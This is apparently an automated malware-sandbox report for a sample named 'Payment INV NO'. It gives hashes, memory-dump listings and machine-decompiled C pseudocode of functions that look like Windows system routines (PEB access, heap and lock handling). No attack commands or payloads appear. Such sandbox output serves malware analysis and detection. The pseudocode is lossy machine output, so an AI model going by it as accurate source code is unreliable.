                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0628d7a1e47f0e4106bffc1e1c9b6607284f9d5ea3984af060374bb7f2c878e3
                                                          • Instruction ID: 24bf8a0b7861979d6724d5e07f825d6e57a2053c2a42e1224f2aa686972a0310
                                                          • Opcode Fuzzy Hash: 0628d7a1e47f0e4106bffc1e1c9b6607284f9d5ea3984af060374bb7f2c878e3
                                                          • Instruction Fuzzy Hash: 141121B0941311ABCB21AF2CC840BEAFBE6EB14710F2402ABFA4697380E631C845C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BAE73 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017BAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E017B7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E017B7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E017B7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E017B7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = L01817794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                          0x017bae78
                                                          0x017bae7c
                                                          0x017bae7e
                                                          0x017bae81
                                                          0x017bae86
                                                          0x017bae8d
                                                          0x01802691
                                                          0x017bae93
                                                          0x017bae93
                                                          0x017bae93
                                                          0x017bae98
                                                          0x017bae9d
                                                          0x018026a2
                                                          0x018026b4
                                                          0x018026a4
                                                          0x018026ad
                                                          0x018026ad
                                                          0x018026b9
                                                          0x00000000
                                                          0x018026bb
                                                          0x00000000
                                                          0x018026bb
                                                          0x017baea3
                                                          0x017baea3
                                                          0x017baea3
                                                          0x017baeaa
                                                          0x018026c0
                                                          0x018026c9
                                                          0x018026c9
                                                          0x017baeb3
                                                          0x018026d4
                                                          0x018026e1
                                                          0x00000000
                                                          0x00000000
                                                          0x018026e7
                                                          0x018026ee
                                                          0x018026f0
                                                          0x018026f9
                                                          0x018026f9
                                                          0x01802702
                                                          0x01802708
                                                          0x01802708
                                                          0x0180270b
                                                          0x0180270f
                                                          0x01802711
                                                          0x01802711
                                                          0x01802725
                                                          0x01802725
                                                          0x00000000
                                                          0x017baeb9
                                                          0x017baeb9
                                                          0x017baebf
                                                          0x017baebf
                                                          0x017baeb3

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bc1ece055cfaa470d021147018da663b61129b70f8f35d8da333336a7f1da83
                                                          • Instruction ID: f535caaa52991b0e25ca8b7887da3ffa4a6452bb495ecbf8ae16474155249355
                                                          • Opcode Fuzzy Hash: 1bc1ece055cfaa470d021147018da663b61129b70f8f35d8da333336a7f1da83
                                                          • Instruction Fuzzy Hash: C021C2726016899FE727AB2CCD88B65B7E9AF44350F1900A0ED04CB6D2E774DD80C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017912D4 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E017912D4(intOrPtr __ecx, intOrPtr* _a4) {
				char _v8;
				char _v12;
				void* _t20;
				intOrPtr _t32;
				signed int _t35;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;

				_push(__ecx);
				_push(__ecx);
				_t41 = 0;
				_t32 = __ecx;
				if( *_a4 != 0) {
					L8:
					_t20 = _t41;
					L9:
					return _t20;
				}
				if(__ecx <= 1) {
					_t32 = 0x25;
				}
				_t35 = 0x10;
				_t2 = _t32 - 1; // 0x24
				_t20 = E017CF3D5( &_v12, _t2 * _t35, _t2 * _t35 >> 0x20);
				if(_t20 < 0) {
					goto L9;
				} else {
					_t37 = _v12;
					_push( &_v8);
					_t39 = 0x34;
					_t41 = E01791C45(_v12, _t39);
					if(_t41 >= 0) {
						_t44 = E017B4620(_t37,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
						if(_t44 == 0) {
							_t41 = 0xc0000017;
						} else {
							E017DFA60(_t44, 0, _v8);
							 *((intOrPtr*)(_t44 + 0x2c)) = _t32;
							_t14 = _t44 + 0xc; // 0xc
							E017D58F0(0x3fff, 0x80000008, _t14);
							 *(_t44 + 8) =  *(_t44 + 8) & 0x00000000;
							 *_t44 = 0x6d6f7441;
							 *((intOrPtr*)(_t44 + 4)) = 1;
							 *_a4 = _t44;
						}
					}
					goto L8;
				}
			}











                                                          0x017912d9
                                                          0x017912da
                                                          0x017912e0
                                                          0x017912e2
                                                          0x017912e6
                                                          0x01791374
                                                          0x01791374
                                                          0x01791376
                                                          0x0179137b
                                                          0x0179137b
                                                          0x017912ef
                                                          0x017912f3
                                                          0x017912f3
                                                          0x017912f6
                                                          0x017912f7
                                                          0x01791301
                                                          0x01791308
                                                          0x00000000
                                                          0x0179130a
                                                          0x0179130a
                                                          0x01791310
                                                          0x01791313
                                                          0x01791319
                                                          0x0179131d
                                                          0x01791333
                                                          0x01791337
                                                          0x0179137e
                                                          0x01791339
                                                          0x0179133f
                                                          0x01791347
                                                          0x0179134a
                                                          0x01791358
                                                          0x01791360
                                                          0x01791364
                                                          0x0179136a
                                                          0x01791371
                                                          0x01791371
                                                          0x01791373
                                                          0x00000000
                                                          0x0179131d

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
                                                          • Instruction ID: d9af648c81af6caa39ce1227b18c5d4920e0aef3126dc50a785f59b78e243975
                                                          • Opcode Fuzzy Hash: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
                                                          • Instruction Fuzzy Hash: 0B11E67260060AFFDB229E54D845F9AFBB9EB85760F104029EA058B640D671EE58D750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C12BD Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E017C12BD(intOrPtr __ecx) {
				signed int _v8;
				signed int _t22;
				signed int _t23;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				signed int _t44;
				intOrPtr _t47;

				_push(__ecx);
				_t47 =  *[fs:0x30];
				_t37 = __ecx;
				_t40 =  *(_t47 + 0x88);
				_t44 = ( *0x1888498 & 0x0000ffff) + _t40;
				if(_t44 >= 0xfffe) {
					L4:
					return _t22;
				}
				_t23 =  *(_t47 + 0x8c);
				if(_t44 == _t23) {
					 *(_t47 + 0x8c) = _t23 + _t23;
					_t22 = E017B4620(_t40,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t23 + _t23 << 2);
					_t41 = _t22;
					_v8 = _t41;
					if(_t41 == 0) {
						 *(_t47 + 0x8c) = _t44;
						goto L4;
					}
					E017DF3E0(_t41,  *(_t47 + 0x90),  *(_t47 + 0x88) << 2);
					_t30 =  *(_t47 + 0x90);
					if( *(_t47 + 0x90) != 0x1886660) {
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t30);
					}
					_t40 =  *(_t47 + 0x88);
					 *(_t47 + 0x90) = _v8;
				}
				 *((intOrPtr*)( *(_t47 + 0x90) + _t40 * 4)) = _t37;
				_t22 =  *(_t47 + 0x88) + 1;
				 *(_t47 + 0x88) = _t22;
				if( *((intOrPtr*)(_t37 + 8)) == 0xddeeddee) {
					 *(_t37 + 0x24) = _t22;
				} else {
					 *(_t37 + 0x7c) = _t22;
				}
				goto L4;
			}











                                                          0x017c12c2
                                                          0x017c12c5
                                                          0x017c12cc
                                                          0x017c12d6
                                                          0x017c12dc
                                                          0x017c12e4
                                                          0x017c1313
                                                          0x017c1319
                                                          0x017c1319
                                                          0x017c12e6
                                                          0x017c12ee
                                                          0x017c131c
                                                          0x017c1331
                                                          0x017c1336
                                                          0x017c1338
                                                          0x017c133d
                                                          0x017c137d
                                                          0x00000000
                                                          0x017c137d
                                                          0x017c1350
                                                          0x017c1355
                                                          0x017c1363
                                                          0x01805512
                                                          0x01805512
                                                          0x017c136c
                                                          0x017c1372
                                                          0x017c1372
                                                          0x017c12f6
                                                          0x017c12ff
                                                          0x017c1300
                                                          0x017c130d
                                                          0x017c1385
                                                          0x017c130f
                                                          0x017c130f
                                                          0x017c130f
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8845747756cce9cb15fd27e072fbc771a8c101dbc606687749072391ffd7b6f
                                                          • Instruction ID: bc4eba63a84a8f2abc3f786f72d2d924674a32dcb96813b499a99466c6e5d60f
                                                          • Opcode Fuzzy Hash: c8845747756cce9cb15fd27e072fbc771a8c101dbc606687749072391ffd7b6f
                                                          • Instruction Fuzzy Hash: 82216771600600EFD735CF28C880BAAF7E9FB48B54F51886DE59ECB652DA30A940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CDE9E Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E017CDE9E(signed char __ecx) {
				signed int* _v0;
				char _v12;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v65;
				void* _v66;
				void* __ebx;
				void* __edi;
				intOrPtr _t79;
				signed char _t81;
				signed int _t82;
				intOrPtr _t86;
				intOrPtr* _t92;
				signed int _t96;
				intOrPtr* _t100;
				signed int _t103;
				signed int _t104;
				intOrPtr _t109;
				intOrPtr* _t110;
				signed int _t116;
				signed int* _t121;
				unsigned int* _t128;
				signed int* _t130;
				signed int* _t135;
				signed int _t138;
				signed int _t140;
				signed char _t145;
				unsigned int _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t161;
				signed int* _t162;
				char _t163;
				signed int _t164;
				signed int _t169;
				signed int _t171;
				intOrPtr* _t173;
				signed int _t176;
				signed int _t177;
				intOrPtr* _t178;
				signed char _t181;
				signed char _t183;
				signed int _t186;
				signed int _t188;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				void* _t196;

				_t194 = _t193 & 0xfffffff8;
				_push(__ecx);
				_t79 =  *0x18884cc; // 0x0
				_push(_t173);
				_t181 = __ecx;
				_t81 = E017B2280(_t79 + 4, _t79 + 4);
				_t1 = _t181 + 0x28; // 0x24
				_t128 = _t1;
				_t82 = E017B2280(_t81, _t128);
				asm("lock xadd [esi+0x50], eax");
				if((_t82 | 0xffffffff) != 1) {
					E017AFFB0(_t128, _t173, _t128);
					L8:
					_t86 =  *0x18884cc; // 0x0
					return E017AFFB0(_t128, _t173, _t86 + 4);
				} else {
					if(E017B7D50() != 0) {
						_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
					} else {
						_t92 = 0x7ffe038e;
					}
					_t2 = _t181 + 0x10; // 0xc
					_t173 = _t2;
					if( *_t92 != 0) {
						L01822EA3(_t181,  *_t173,  *((intOrPtr*)(_t173 + 4)));
					}
					_push(_t173);
					E017DB150();
					_t3 = _t181 + 0x1c; // 0x18
					_t96 = _t3;
					_t162 =  *_t96;
					if(_t162[1] != _t96) {
						L10:
						_t145 = 3;
						asm("int 0x29");
						_t191 = _t194;
						_push(_t145);
						_push(_t145);
						_push(_t128);
						_push(_t181);
						_push(_t173);
						_t130 = _t162;
						_t183 = _t145;
						asm("lock xadd [esi+0x2c], eax");
						if((_t96 | 0xffffffff) == 1) {
							_t146 =  *((intOrPtr*)(_t183 + 0x28));
							if( *((intOrPtr*)(_t183 + 0x28)) != 0) {
								E0179A745(_t130, _t146, _t162, _t173);
							}
							_t100 = _t183 + 4;
							_t163 =  *_t100;
							if( *((intOrPtr*)(_t163 + 4)) != _t100) {
								L20:
								_t147 = 3;
								asm("int 0x29");
								_push(_t191);
								_t196 = (_t194 & 0xfffffff8) - 0x1c;
								_v56 = _v56 & 0x00000000;
								_push(_t130);
								 *((char*)(_t196 + 0xb)) = _t163;
								 *(_t196 + 0x18) = _t147;
								_push(_t183);
								_push(_t173);
								_t135 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + ((_t147 >> 0x00000005 & 0x0000007f) + 0x97) * 4;
								_t103 = 0;
								_t164 =  *_t135;
								_v48 = _t135;
								 *(_t196 + 0x12) = 0;
								if(_t164 != 0) {
									while((_t164 & 0x00000001) == 0) {
										_t103 = _t164;
										if((_t164 & 0x00000002) != 0) {
											asm("lock cmpxchg [ebx], ecx");
											if(_t103 != _t164) {
												goto L54;
											}
										} else {
											_t186 = _t164 | 0x00000002;
											asm("lock cmpxchg [ebx], ecx");
											if(_t103 != _t164) {
												L54:
												_t164 = _t103;
												if(_t103 != 0) {
													continue;
												} else {
												}
											} else {
												while(1) {
													L25:
													_t138 = _t186 & 0xfffffffc;
													 *(_t196 + 0x24) = _t138;
													_t176 = _t138;
													if( *((intOrPtr*)(_t138 + 0x10)) == 0) {
														goto L56;
													}
													L26:
													_t177 =  *((intOrPtr*)(_t176 + 0x10));
													 *((intOrPtr*)(_t138 + 0x10)) = _t177;
													while(_t177 != 0) {
														_t169 =  *((intOrPtr*)(_t177 + 0xc));
														_v52 = _t169;
														if( *_t177 !=  *((intOrPtr*)(_t196 + 0x20))) {
															L60:
															_t177 = _t169;
															continue;
														} else {
															_t152 =  *(_t177 + 8);
															if(_t177 != _t138) {
																 *(_t169 + 8) = _t152;
																_t153 =  *(_t177 + 8);
																_t109 =  *((intOrPtr*)(_t177 + 0xc));
																if(_t153 != 0) {
																	 *((intOrPtr*)(_t153 + 0xc)) = _t109;
																} else {
																	 *((intOrPtr*)(_t138 + 0x10)) = _t109;
																	 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xc)) + 0x10)) =  *((intOrPtr*)(_t177 + 0xc));
																}
																goto L34;
															} else {
																if(_t152 != 0) {
																	_t152 = _t152 ^ (_t152 ^ _t186) & 0x00000003;
																}
																_t116 = _t186;
																asm("lock cmpxchg [ebx], edx");
																_t138 =  *(_t196 + 0x24);
																if(_t116 != _t186) {
																	_t186 = _t116;
																	goto L25;
																} else {
																	_t171 =  *(_t177 + 8);
																	_t156 = _t152 & 0xffffff00 | _t152 == 0x00000000;
																	 *(_t196 + 0x12) = _t156;
																	if(_t171 != 0) {
																		 *(_t171 + 0xc) =  *(_t171 + 0xc) & 0x00000000;
																		 *((intOrPtr*)(_t171 + 0x10)) =  *((intOrPtr*)(_t177 + 0x10));
																		 *(_t196 + 0x12) = _t156;
																	}
																	_t169 = _v52;
																	L34:
																	_t154 = 2;
																	_t110 = _t177 + 0x14;
																	_t155 =  *_t110;
																	 *_t110 = _t154;
																	if(_t155 == 2) {
																		goto L60;
																	} else {
																		if(_t155 == 0) {
																			 *(_t177 + 8) = _v56;
																			_v56 = _t177;
																		}
																		if( *((char*)(_t196 + 0x13)) != 0) {
																			goto L60;
																		}
																	}
																}
															}
														}
														break;
													}
													_t103 = _v56;
													if(_t103 != 0) {
														do {
															_push( *((intOrPtr*)(_t103 + 4)));
															_t188 =  *(_t103 + 8);
															E017D9BF0();
															_t103 = _t188;
														} while (_t188 != 0);
													}
													if( *(_t196 + 0x12) == 0) {
														_t151 =  *_v48;
														while(1) {
															_t140 = _t151 & 0x00000001;
															asm("sbb edx, edx");
															_t103 = _t151;
															asm("lock cmpxchg [esi], edx");
															if(_t103 == _t151) {
																break;
															}
															_t151 = _t103;
														}
														if(_t140 != 0) {
															_t103 = L0184CF30(_t103);
														}
													}
													goto L41;
													do {
														L56:
														_t104 = _t176;
														_t176 =  *(_t176 + 8);
														 *(_t176 + 0xc) = _t104;
													} while ( *((intOrPtr*)(_t176 + 0x10)) == 0);
													goto L26;
												}
											}
										}
										goto L41;
									}
								}
								L41:
								return _t103;
							} else {
								_t157 =  *((intOrPtr*)(_t100 + 4));
								if( *_t157 != _t100) {
									goto L20;
								} else {
									 *_t157 = _t163;
									 *((intOrPtr*)(_t163 + 4)) = _t157;
									_t178 =  *((intOrPtr*)(_t183 + 0x30));
									 *_t130 =  *(_t183 + 0x38);
									 *_v0 =  *(_t183 + 0x3c);
									_t121 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t183);
									if(_t178 != 0) {
										 *_t178 = 1;
										_t121 =  &_v12;
										asm("lock or [eax], ecx");
										_push(0);
										L21();
									}
									goto L13;
								}
							}
						} else {
							_t121 = _v0;
							 *_t130 =  *_t130 & 0x00000000;
							 *_t121 =  *_t121 & 0x00000000;
							L13:
							return _t121;
						}
					} else {
						_t161 =  *(_t96 + 4);
						if( *_t161 != _t96) {
							goto L10;
						} else {
							 *_t161 = _t162;
							_t162[1] = _t161;
							E017AFFB0(_t128, _t173, _t128);
							if( *((intOrPtr*)(_t181 + 0x58)) != 0) {
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t181 + 0x58)));
							}
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t181);
							goto L8;
						}
					}
				}
			}



























































                                                          0x017cdea3
                                                          0x017cdea6
                                                          0x017cdea7
                                                          0x017cdeae
                                                          0x017cdeb2
                                                          0x017cdeb5
                                                          0x017cdeba
                                                          0x017cdeba
                                                          0x017cdebe
                                                          0x017cdec6
                                                          0x017cdecc
                                                          0x017cdf40
                                                          0x017cdf2a
                                                          0x017cdf2a
                                                          0x017cdf3e
                                                          0x017cdece
                                                          0x017cded5
                                                          0x0180b445
                                                          0x017cdedb
                                                          0x017cdedb
                                                          0x017cdedb
                                                          0x017cdee2
                                                          0x017cdee2
